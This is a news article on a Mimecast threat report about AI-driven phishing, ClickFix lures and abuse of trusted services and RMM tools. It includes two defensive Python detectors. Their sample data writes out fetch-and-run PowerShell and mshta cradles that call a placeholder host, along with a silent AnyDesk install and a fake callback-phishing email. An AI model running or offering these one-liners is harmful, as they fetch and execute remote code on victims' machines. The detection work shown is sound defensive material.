Mimecast Report: AI Phishing and ClickFix Attacks Explode

2025 has been a terrific year for cybercriminals: AI-augmented phishing surged 500%, a new report reveals.
According to Mimecast's latest threat intelligence report, the company detected more than 9.3 billion threats in the first nine months of 2025.
AI has made phishing campaigns and ClickFix schemes more sophisticated, and both increasingly abuse trusted services to evade detection.
The report says phishing now accounts for 77% of all attacks, up from 60% in 2024.
“We’re seeing a clear evolution in attacker behaviour in 2025, headlined by an exponential rise in AI-driven threats,” said Ranjan Singh, Mimecast Chief Product & Technology Officer.
“Financial platforms, regulatory agencies, and city governments have all been targeted by profit-driven ransomware groups and highly organised, state-sponsored adversaries.
“Threat actors are doubling down on human-focused attacks and exploiting trusted business services as their primary means of intrusion, making employee awareness and resilient systems more essential than ever.”
AI as a partner in cybercrime
Long gone are the days when a phishing email could be spotted by its ridiculous grammatical errors and ludicrous spelling mistakes.
Generative AI now lets threat actors craft flawless, compelling phishing emails that impersonate vendors, partners and employees.
This has driven a dramatic rise in ClickFix schemes, AI-augmented phishing and Business Email Compromise (BEC).
Mimecast notes a significant increase in the sophistication of social engineering attacks that exploit human vulnerabilities, especially ClickFix schemes.
In a ClickFix scheme, attackers use a fake error message or verification prompt (a bogus CAPTCHA, a "fix it" dialog) to lure the user into copying a command and pasting it into the Run dialog or a terminal on their own device. The victim executes the payload themselves, so no attachment or exploit has to get past the email gateway.
Attackers are Living Off Trusted Services (LOTS)
Attacks that exploit human trust by riding on the services and business tools employees use every day continue to evolve.
Platforms like Adobe Pay, DocuSign and Salesforce are weaponised in these schemes, and the report names DocSend as the most abused service in 2025.
Threat actors also put their phishing pages behind legitimate, customised CAPTCHA services. This not only lends the lure credibility but also stops automated URL scanners and sandboxes from reaching the page, slowing detection.
Mimecast has detected over 900,000 unique CAPTCHA-protected URLs each month in the US and UK, linked to the notorious cybercrime group Scattered Spider.
Ranjan says threat actors are abandoning traditional malware in favour of legitimate Remote Monitoring and Management (RMM) tools such as ScreenConnect, TeamViewer and AnyDesk.
“These legitimate tools provide persistent remote access while blending with authorised business software,” he says. “They’re often whitelisted, making detection exponentially harder than traditional malware.
“Email security has become so effective at catching malware that attackers have completely changed tactics. They’re no longer deploying malicious code, they’re weaponising your trusted software.”
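The two living-off-trusted-services patterns described above, ClickFix pastes and quietly installed RMM agents, both show up in endpoint process-creation telemetry rather than in email, which is the point of the quote above. The following detector is an added example and is not code from the Mimecast report or from Mimecast; it uses field names shaped like Sysmon Event ID 1 (Image, ParentImage, CommandLine, User), the sample events are constructed, and the RMM approval policy (only ScreenConnect under Program Files (x86) is sanctioned) is an assumption made for the example. The ClickFix rule keys on an interactive parent (the Run box and Explorer address bar are hosted by explorer.exe) spawning a script interpreter with a download cradle, and it decodes -EncodedCommand payloads before matching so that base64 does not hide the cradle.

```python
"""Process-creation triage for ClickFix pastes and unsanctioned RMM agents.
Added example, not from the Mimecast report. Field names follow Sysmon
Event ID 1; the events below are constructed, not real telemetry."""
import base64
import re
from typing import Dict, List, Optional

# Interpreters a ClickFix lure tells the victim to paste the command into.
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                   "curl.exe", "certutil.exe", "bitsadmin.exe"}
# Parents that mean "a person typed or pasted this": the Run box (Win+R) and the
# File Explorer address bar are hosted by explorer.exe; terminals by the others.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "conhost.exe"}
# Download-cradle and evasion tokens common in ClickFix one-liners.
CRADLE_RE = re.compile(
    r"invoke-expression|\biex\b|invoke-restmethod|\birm\b|invoke-webrequest|\biwr\b|"
    r"downloadstring|downloadfile|https?://|-w(?:indowstyle)?\s+hidden|frombase64string",
    re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by base64 of a UTF-16LE script.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# RMM agents to watch. Value = approved install-path prefix, or None when the
# tool is not sanctioned at all. ASSUMED policy for this example: only
# ScreenConnect installed under Program Files (x86) is the corporate tool.
RMM_POLICY: Dict[str, Optional[str]] = {
    "anydesk.exe": None,
    "teamviewer.exe": None,
    "screenconnect.clientservice.exe": r"c:\program files (x86)\screenconnect client",
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Plaintext of a PowerShell -EncodedCommand argument, or '' if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(ev: Dict[str, str]) -> List[str]:
    """Detection tags that fire on one process-creation event."""
    tags: List[str] = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    # Match against the raw command line plus whatever -enc was hiding.
    haystack = cmd + " " + decode_encoded_command(cmd)

    # Rule 1: interactive host -> script interpreter -> download cradle = ClickFix.
    if image in LOLBIN_CHILDREN and parent in INTERACTIVE_PARENTS and CRADLE_RE.search(haystack):
        tags.append("clickfix")
    # Rule 2: RMM agent that is unsanctioned or running outside its approved path.
    if image in RMM_POLICY:
        approved_prefix = RMM_POLICY[image]
        if approved_prefix is None or not ev.get("Image", "").lower().startswith(approved_prefix):
            tags.append("rmm-unapproved")
    return tags


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run every event through classify() and keep the ones that fired."""
    hits: List[Dict[str, object]] = []
    for ev in events:
        tags = classify(ev)
        if tags:
            hits.append({"user": ev.get("User", ""), "image": basename(ev.get("Image", "")), "tags": tags})
    return hits


# Constructed sample events (not real telemetry). The -enc payload is built here
# so the decoder is exercised on a genuine UTF-16LE/base64 blob.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s')".encode("utf-16le")
).decode()
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"User": "CORP\\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://example.invalid/fix | iex"'},
    {"User": "CORP\\asmith", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"User": "CORP\\bli", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -w hidden -nop -enc {_ENC}"},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\ProgramData\Scripts\inventory.ps1"},
    {"User": "CORP\\jdoe", "ParentImage": r"C:\Users\jdoe\Downloads\Support-Update.exe",
     "Image": r"C:\Users\jdoe\AppData\Local\Temp\AnyDesk.exe",
     "CommandLine": r"C:\Users\jdoe\AppData\Local\Temp\AnyDesk.exe --install C:\Users\jdoe\AppData\Local\AnyDesk --start-with-win --silent"},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Program Files (x86)\ScreenConnect Client (corp)\ScreenConnect.ClientService.exe",
     "CommandLine": r'"C:\Program Files (x86)\ScreenConnect Client (corp)\ScreenConnect.ClientService.exe"'},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['user']:<22} {hit['image']:<34} {','.join(hit['tags'])}")
```

Run stand-alone it flags the three ClickFix pastes (plain, mshta and base64-encoded) and the AnyDesk dropped into a user's Temp directory, while the SYSTEM-run inventory script and the sanctioned ScreenConnect service stay silent. The path-prefix check is what separates "whitelisted tool" from "whitelisted tool in the wrong place", which is the gap the quote above describes.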
Multichannel attacks against the most vulnerable vector: the human
“Attacks always tend towards the most vulnerable vector, which is now the human,” says Rob Juncker, Chief Product Officer at Mimecast.
To take full advantage of human vulnerabilities, attackers coordinate across multiple communication channels to evade detection.
A common example is a phishing email that carries a phone number, typically instead of a link: once the victim dials it, the interaction moves off email and out of view of email security tools.
Attackers then use AI-generated synthetic voices and deepfakes to impersonate executives or to run IT support scams.
Rob says that broadening the conversation from email security to securing the whole human is the logical next step.
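Because the callback lure above contains nothing for a URL or attachment scanner to detonate, the email-side signal has to come from the message text itself. The scorer below is an added example, not Mimecast's detection logic: it pulls phone numbers out of the body (including numbers obfuscated with letter look-alikes such as 8OO-555-O199), checks for pressure vocabulary and money amounts, and weights a phone number more heavily when it is the only call to action. The sample messages and the scoring thresholds are constructed for illustration.

```python
"""Callback-phishing (phone-number lure) scorer for email text.
Added example, not Mimecast's detector. Samples and thresholds are constructed."""
import re
from typing import Dict, List, Tuple

# Look-alike characters used to hide phone numbers from naive regexes. The
# translation is applied only to the copy we search, never to what we display.
HOMOGLYPHS = str.maketrans({"O": "0", "o": "0", "I": "1", "l": "1", "|": "1"})
# North American numbers with optional country code and mixed separators.
PHONE_RE = re.compile(r"(?<!\d)(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}(?!\d)")
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
MONEY_RE = re.compile(r"(?:\$|usd)\s?\d[\d,]*(?:\.\d{2})?", re.IGNORECASE)
# Pressure/pretext vocabulary typical of callback lures; stems, so that
# "renewed", "charged" and "cancellation" also count.
PRESSURE = ("call", "cancel", "refund", "charge", "invoice", "renew",
            "subscription", "within 24", "immediately", "support", "verify")


def normalize_number(raw: str) -> str:
    """Digits only; drop a leading US country code so variants dedupe."""
    digits = re.sub(r"\D", "", raw)
    return digits[1:] if len(digits) == 11 and digits.startswith("1") else digits


def extract_numbers(text: str) -> List[str]:
    """Unique normalized phone numbers found in text after homoglyph folding."""
    folded = text.translate(HOMOGLYPHS)
    return sorted({normalize_number(m.group()) for m in PHONE_RE.finditer(folded)})


def score_callback_lure(subject: str, body: str) -> Dict[str, object]:
    """Heuristic score: higher means more like a phone-callback phish."""
    text = f"{subject}\n{body}"
    lower = text.lower()
    numbers = extract_numbers(text)
    urls = URL_RE.findall(text)
    hits = [w for w in PRESSURE if w in lower]

    score = 0
    if numbers:
        score += 1                      # a number to dial exists
    score += min(len(hits), 3)          # pressure vocabulary, capped
    if numbers and hits and not urls:
        score += 2                      # phone is the ONLY action, wrapped in urgency
    if MONEY_RE.search(text):
        score += 1                      # fake charge / refund pretext
    verdict = "callback-lure" if score >= 5 else "review" if score >= 3 else "clean"
    return {"numbers": numbers, "urls": urls, "pressure": hits, "score": score, "verdict": verdict}


# Constructed sample messages (subject, body); none are real emails.
SAMPLES: List[Tuple[str, str]] = [
    ("Your Geek Squad subscription has been renewed",
     "We charged $349.99 to your card for another year of protection. "
     "To cancel and request a refund, call 1-8OO-555-O199 within 24 hours."),
    ("Team lunch Thursday",
     "Team lunch is Thursday at noon. Reply with dietary needs. "
     "The front desk line is 415-555-0132 if you cannot find the room."),
    ("Invoice 4471 due",
     "Invoice 4471 is attached. Pay online at https://billing.example.invalid/inv/4471 "
     "or call support on (212) 555-0147."),
    ("Q3 roadmap review",
     "Agenda for Monday: Q3 roadmap review and the hiring plan."),
]

if __name__ == "__main__":
    for subject, body in SAMPLES:
        r = score_callback_lure(subject, body)
        print(f"{r['verdict']:<14} score={r['score']} numbers={r['numbers']} subject={subject!r}")
```

The renewal lure scores as a callback lure, the vendor invoice with both a link and a number lands in "review", and the two ordinary office messages stay clean. The homoglyph fold is the part worth keeping: a filter that only matches ASCII digits never sees "8OO-555-O199" as a number at all.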
“When it comes to human risk, one of the biggest challenges is figuring out who your riskiest users are,” he notes. “Our research showed that 8% of your users lead to 80% of your risk.
“We’ve got to better secure the users from Gen AI attacks which are firing laser targeted, accurate, phishing attempts at those users.”
Tailored attacks against high-value sectors
The Mimecast report shows that professional education, IT software, telecommunications, real estate and legal organisations experience a much higher volume of impersonation attacks.
Of these sectors, real estate saw a particularly high volume of phishing attempts.
The report also uncovered phishing campaigns that combined email impersonation with large-scale credential harvesting to target hospitality industry professionals specifically.
“Cyber defence can no longer be treated solely as a technology issue,” says Mimecast Chief Information Security Officer, Leslie Nielsen.
“It’s equally about people and organisational resilience.
“Countering these threats requires organisations to adapt by preparing employees to recognise suspicious activity and leveraging tools like AI internally to enhance both business workflows and security operations.
“As threat actors continue to target the human layer through deception, trust exploitation and multichannel coordination, building awareness and resilient response capabilities becomes critical.”